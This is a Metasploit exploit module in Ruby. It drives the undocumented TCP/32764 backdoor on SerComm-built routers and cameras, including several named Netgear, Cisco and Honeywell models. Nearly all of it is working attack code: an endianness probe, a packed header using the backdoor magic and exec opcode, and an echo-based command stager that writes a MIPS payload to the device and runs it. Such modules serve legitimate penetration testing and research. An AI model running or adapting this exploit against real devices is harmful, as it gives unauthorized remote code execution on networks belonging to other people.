##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
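class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStager

  # Drives the undocumented TCP/32764 service on a number of SerComm-built
  # devices. Any bytes sent to the port are answered with a 4-byte magic whose
  # byte order reveals the device endianness; opcode 0x07 followed by a length
  # and a command string runs that command. The CmdStager mixin calls
  # execute_command once per staged line to echo a MIPS payload onto the device
  # and run it.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "SerComm Device Remote Code Execution",
        'Description' => %q{
          This module will cause remote code execution on several SerComm devices.
          These devices typically include routers from NetGear and Linksys.
          This module was tested successfully against several NetGear, Honeywell
          and Cisco devices.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Eloi Vanderbeken <eloi.vanderbeken[at]gmail.com>', # Initial discovery, poc
          'Matt "hostess" Andreko <mandreko[at]accuvant.com>' # Msf module
        ],
        'Payload' => {
          'Space' => 10000, # Could be more, but this should be good enough
          'DisableNops' => true
        },
        'Platform' => 'linux',
        'Privileged' => false,
        # Per-target keys, read by #exploit:
        #   PackFormat    - Array#pack directive for the three 32-bit header words
        #                   ('VVV' little-endian, 'NNN' big-endian on the wire)
        #   NoArgs        - echo without the "-en" parameters
        #   UploadPath    - directory the stager writes the payload to
        #   PayloadEncode - 'hex' or 'octal' escaping for the echoed bytes
        # "Manual" targets take these from the advanced options instead.
        'Targets' => [
          [
            'Generic Linux MIPS Big Endian',
            {
              'Arch' => ARCH_MIPSBE,
              'PackFormat' => 'VVV'
            }
          ],
          [
            'Generic Linux MIPS Little Endian',
            {
              'Arch' => ARCH_MIPSLE,
              'PackFormat' => 'NNN'
            }
          ],
          [
            'Manual Linux MIPS Big Endian',
            {
              'Arch' => ARCH_MIPSBE
            }
          ],
          [
            'Manual Linux MIPS Little Endian',
            {
              'Arch' => ARCH_MIPSLE
            }
          ],
          [
            'Cisco WAP4410N',
            {
              'Arch' => ARCH_MIPSBE,
              'PackFormat' => 'NNN'
            }
          ],
          [
            'Honeywell WAP-PL2 IP Camera',
            {
              'Arch' => ARCH_MIPSLE,
              'PackFormat' => 'VVV'
            }
          ],
          [
            'Netgear DG834',
            {
              'Arch' => ARCH_MIPSBE,
              'PackFormat' => 'VVV',
              'NoArgs' => true
            }
          ],
          [
            'Netgear DG834G',
            {
              'Arch' => ARCH_MIPSLE,
              'PackFormat' => 'VVV',
              'PayloadEncode' => 'octal'
            }
          ],
          [
            'Netgear DG834PN',
            {
              'Arch' => ARCH_MIPSBE,
              'PackFormat' => 'VVV',
              'NoArgs' => true
            }
          ],
          [
            'Netgear DGN1000',
            {
              'Arch' => ARCH_MIPSBE,
              'PackFormat' => 'VVV',
              'NoArgs' => true
            }
          ],
          [
            'Netgear DSG835',
            {
              'Arch' => ARCH_MIPSBE,
              'PackFormat' => 'VVV',
              'NoArgs' => true
            }
          ],
          [
            'Netgear WPNT834',
            {
              'Arch' => ARCH_MIPSBE,
              'PackFormat' => 'NNN',
              'UploadPath' => '/var',
              'PayloadEncode' => 'octal'
            }
          ]
        ],
        'DefaultTarget' => 0,
        'References' => [
          [ 'OSVDB', '101653' ],
          [ 'URL', 'https://github.com/elvanderb/TCP-32764' ]
        ],
        'DisclosureDate' => '2013-12-31',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(32764)
      ]
    )

    # Only consulted for the "Manual" targets; every other target carries the
    # equivalent values in its target table entry.
    register_advanced_options(
      [
        OptEnum.new('PACKFORMAT', [false, "Pack Format to use", 'VVV', ['VVV', 'NNN']]),
        OptString.new('UPLOADPATH', [false, "Remote path to land the payload", "/tmp" ]),
        OptBool.new('NOARGS', [false, "Don't use the echo -en parameters", false ]),
        OptEnum.new('ENCODING', [false, "Payload encoding to use", 'hex', ['hex', 'octal']]),
      ]
    )
    # The stager flavor is fixed to :echo in #exploit, so these make no sense here.
    deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
  end

  # Probes RPORT once and classifies the reply.
  #
  # Returns Appears when the backdoor magic comes back (and warns if its byte
  # order disagrees with the selected target), Safe when the service answers
  # without the magic, and Unknown when the port could not be reached at all --
  # an unreachable host is not evidence that it is patched.
  def check
    fprint = endian_from_banner(probe_backdoor)

    if fprint.nil?
      vprint_status("Service answered without the backdoor magic")
      return Msf::Exploit::CheckCode::Safe
    end

    vprint_status("Detected #{fprint == 'BE' ? 'Big' : 'Little'} Endian")
    warn_on_endian_mismatch(fprint)
    Msf::Exploit::CheckCode::Appears
  rescue ::Rex::ConnectionError => e
    print_error("Connection failed: #{e.class}: #{e}")
    Msf::Exploit::CheckCode::Unknown
  end

  # Selects the per-target wire settings, sanity-checks them, and hands the
  # payload to the echo-based command stager (which calls #execute_command).
  #
  # Raises Failure::BadConfig via fail_with if no pack format is available for
  # the header, since that is the one setting #execute_command cannot do
  # without.
  def exploit
    if target.name.include?('Manual')
      print_warning("Remember you can configure Manual targets with NOARGS, UPLOADPATH, ENCODING and PACKFORMAT advanced options")
      @no_args = datastore['NOARGS']
      @upload_path = datastore['UPLOADPATH']
      @encoding_format = datastore['ENCODING']
      @pack_format = datastore['PACKFORMAT']
    else
      @no_args = target['NoArgs']
      @upload_path = target['UploadPath']
      @encoding_format = target['PayloadEncode']
      @pack_format = target['PackFormat']
    end

    fail_with(Failure::BadConfig, 'No pack format is set for the selected target') if @pack_format.nil?

    # Non-fatal: a payload built for the wrong byte order simply will not run,
    # so tell the operator before spending the stager round trips.
    fprint = endian_fingerprint
    warn_on_endian_mismatch(fprint) if fprint

    execute_cmdstager(
      :noargs => @no_args,
      :temp => @upload_path,
      :enc_format => @encoding_format,
      :flavor => :echo
    )
  end

  # Fingerprints the byte order of the device behind RPORT.
  #
  # Returns 'BE', 'LE', or nil when the service did not reply with the backdoor
  # magic. A connection failure is reported with print_error and also yields
  # nil, so callers that need to tell the two apart should use #probe_backdoor
  # directly (as #check does).
  def endian_fingerprint
    endian_from_banner(probe_backdoor)
  rescue ::Rex::ConnectionError => e
    print_error("Connection failed: #{e.class}: #{e}")
    nil
  end

  # Sends one command to the backdoor; invoked by the CmdStager mixin for each
  # staged line. The wire format is three 32-bit words packed with the target's
  # PackFormat -- magic, opcode, command length -- followed by the raw command
  # bytes. opts is part of the mixin's calling convention and is unused here.
  def execute_command(cmd, opts)
    # The device reads exactly this many bytes after the header, so count
    # bytes, not characters, and send the command as raw bytes.
    body = cmd.b

    # 0x53634d4d => Backdoor code
    # 0x07 => Exec command
    # body.bytesize => Length of command to execute, sent after communication struct
    header = [0x53634d4d, 0x07, body.bytesize].pack(@pack_format)

    begin
      connect
      # Send command structure followed by command text
      sock.put(header + body)
    ensure
      # Close the socket even if put raises, so a failed line does not leak it.
      disconnect
    end

    # Give the device a moment to run the command before the next line arrives.
    Rex.sleep(1)
  end

  private

  # Opens one connection, sends a few junk bytes and returns whatever the
  # service replies with (nil if nothing arrives). The backdoor answers any
  # input with its 4-byte magic. Connection errors propagate to the caller;
  # the socket is always closed.
  def probe_backdoor
    connect
    sock.put(rand_text(5))
    sock.get_once
  ensure
    disconnect
  end

  # Maps the banner to the endianness label the target table is keyed on:
  # "MMcS" => 'BE', "ScMM" => 'LE', anything else (including nil) => nil.
  # These labels are what the per-target PackFormat values were chosen
  # against, so do not swap them.
  def endian_from_banner(res)
    return nil if res.nil?
    return 'BE' if res.start_with?("MMcS")
    return 'LE' if res.start_with?("ScMM")

    nil
  end

  # 'BE' / 'LE' for the selected target's Arch, nil if it is neither MIPS flavor.
  def target_endian
    case target['Arch']
    when ARCH_MIPSBE then 'BE'
    when ARCH_MIPSLE then 'LE'
    end
  end

  # Warns when the fingerprinted byte order disagrees with the selected target.
  def warn_on_endian_mismatch(fprint)
    expected = target_endian
    return if expected.nil? || expected == fprint

    print_warning("Device reports #{fprint} byte order but target '#{target.name}' is #{expected}; pick the matching Generic or Manual target")
  end
end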